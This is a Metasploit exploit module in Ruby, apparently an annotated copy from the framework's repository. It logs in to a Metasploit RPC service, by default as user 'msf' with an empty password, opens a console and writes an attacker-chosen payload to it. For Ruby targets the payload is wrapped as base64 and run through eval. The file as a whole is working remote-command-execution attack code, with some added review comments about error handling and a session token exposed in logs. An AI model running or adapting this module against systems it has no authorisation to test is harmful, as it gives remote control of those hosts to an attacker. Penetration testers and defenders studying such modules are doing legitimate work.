GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/msf_rpc_console.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
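# Module that authenticates to a Metasploit RPC service and runs a payload
# through a console it creates there.
#
# No software flaw is involved: after a successful login the module calls the
# 'console.write' procedure, so exposure comes down to who can reach the RPC
# port and who knows the credentials. The options registered below default to
# port 55552, username 'msf', an empty password and SSL enabled.
#
# Seen from the RPC service, a run is the call sequence: login, 'core.version',
# 'console.create', 'console.write', 'console.destroy'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata, the three targets and the connection and
  # credential options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Metasploit RPC Console Command Execution',
      'Description'    => %q{
        This module connects to a specified Metasploit RPC server and
        uses the 'console.write' procedure to execute operating
        system commands. Valid credentials are required to access the
        RPC interface.

        This module has been tested successfully on Metasploit 4.15
        on Kali 1.0.6; Metasploit 4.14 on Kali 2017.1; and Metasploit
        4.14 on Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'bcoles',
      'References'     =>
        [
          [ 'URL', 'https://help.rapid7.com/metasploit/Content/api/rpc/overview.html' ],
          [ 'URL', 'https://community.rapid7.com/docs/DOC-1516' ]
        ],
      'Platform'       => %w{ ruby unix win },
      # The command targets also exclude LF and CR, presumably because
      # execute_command frames the command with "\r\n" on a single console
      # line -- TODO confirm.
      'Targets'        => [
        [ 'Ruby',        { 'Arch'     => ARCH_RUBY,
                           'Platform' => 'ruby',
                           'Payload'  => { 'BadChars' => "\x00" } } ],
        [ 'Windows CMD', { 'Arch'     => ARCH_CMD,
                           'Platform' => 'win',
                           'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ],
        [ 'Unix CMD',    { 'Arch'     => ARCH_CMD,
                           'Platform' => 'unix',
                           'Payload'  => { 'BadChars' => "\x00\x0A\x0D" } } ]
      ],
      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 15 },
      'Privileged'     => false,
      'DisclosureDate' => '2011-05-22',
      'DefaultTarget'  => 0))
    register_options [ Opt::RPORT(55552),
      OptString.new('USERNAME', [true, 'Username for Metasploit RPC', 'msf']),
      OptString.new('PASSWORD', [true, 'Password for the specified username', '']),
      OptBool.new('SSL', [ true, 'Use SSL', true]) ]
  end

  # Writes one command line to the console created by #exploit.
  #
  # @param cmd [String] text sent to 'console.write', wrapped in "\r\n"
  # @param opts [Hash] accepted for interface compatibility; not read here
  # @return [void]
  def execute_command(cmd, opts = {})
    res = @rpc.call 'console.write', @console_id, "\r\n#{cmd}\r\n"

    fail_with Failure::Unknown, 'Connection failed' if res.nil?

    # A successful write is reported as a numeric 'wrote' field; anything
    # else is printed as-is so the operator sees the server's answer.
    unless res['wrote'].to_s =~ /\A\d+\z/
      print_error "Could not write to console #{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Wrote #{res['wrote']} bytes to console"
  end

  # Connects, logs in, reports the server version, creates a console and
  # writes the payload command for the selected target to it.
  #
  # @return [void]
  def exploit
    begin
      @rpc = Msf::RPC::Client.new :host => rhost, :port => rport, :ssl => ssl
    rescue Rex::ConnectionRefused
      fail_with Failure::Unreachable, 'Connection refused'
    rescue => e
      fail_with Failure::Unknown, "Connection failed: #{e}"
    end

    @rpc.login datastore['USERNAME'], datastore['PASSWORD']

    # Login success is judged by whether the client now holds a token.
    fail_with Failure::NoAccess, 'Authentication failed' if @rpc.token.nil?

    print_good 'Authenticated successfully'
    # NOTE(review): verbose output contains the RPC session token, so any
    # spool or log file capturing it holds a usable credential.
    vprint_status "Received temporary token: #{@rpc.token}"

    version = @rpc.call 'core.version'

    # Check the reply to 'core.version' itself. The original tested the login
    # result here, so a nil reply reached version['version'] below and raised
    # NoMethodError instead of failing cleanly.
    fail_with Failure::Unknown, 'Connection failed' if version.nil?

    print_status "Metasploit #{version['version']}"
    print_status "Ruby #{version['ruby']}"
    print_status "API version #{version['api']}"

    vprint_status 'Creating new console...'
    res = @rpc.call 'console.create'

    fail_with Failure::Unknown, 'Connection failed' if res.nil?

    unless res['id'].to_s =~ /\A\d+\z/
      print_error 'Could not create console:'
      print_line res.to_s
      return
    end

    # Stored only after validation, so #cleanup destroys a console only when
    # one was really created.
    @console_id = res['id']
    print_good "Created console ##{@console_id}"

    print_status 'Sending payload...'

    case target['Platform']
    when 'ruby'
      # The payload is base64-encoded and decoded again inside the ruby -e
      # argument, presumably so quotes in the payload cannot break the
      # single-quoted command -- TODO confirm.
      cmd = "ruby -e 'eval(%[#{Rex::Text.encode_base64(payload.encoded)}].unpack(%[m0]).first)'"
    when 'win', 'unix'
      cmd = payload.encoded
    else
      fail_with Failure::NoTarget, 'Invalid target'
    end

    execute_command cmd
  end

  # Destroys the console created by #exploit, if any, and closes the RPC
  # client.
  #
  # @return [void]
  def cleanup
    return if @console_id.nil?

    vprint_status 'Removing console...'
    res = @rpc.call 'console.destroy', @console_id

    if res.nil?
      print_error 'Connection failed'
      return
    end

    unless res['result'].eql? 'success'
      print_warning "Could not destroy console ##{@console_id}:"
      print_line res.to_s
      return
    end

    vprint_good "Destroyed console ##{@console_id}"
  ensure
    # @rpc is still nil when the connection attempt in #exploit failed; the
    # original called close unconditionally and raised NoMethodError here.
    @rpc.close if @rpc
  end
end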